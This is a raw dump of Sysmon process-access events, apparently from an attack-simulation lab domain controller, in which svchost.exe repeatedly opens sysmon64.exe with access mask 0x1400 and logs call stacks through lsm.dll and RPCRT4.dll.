08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.355{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.349{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.349{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.349{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.348{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.343{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.343{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.343{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.343{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.342{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.342{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.342{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.342{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.342{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.341{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 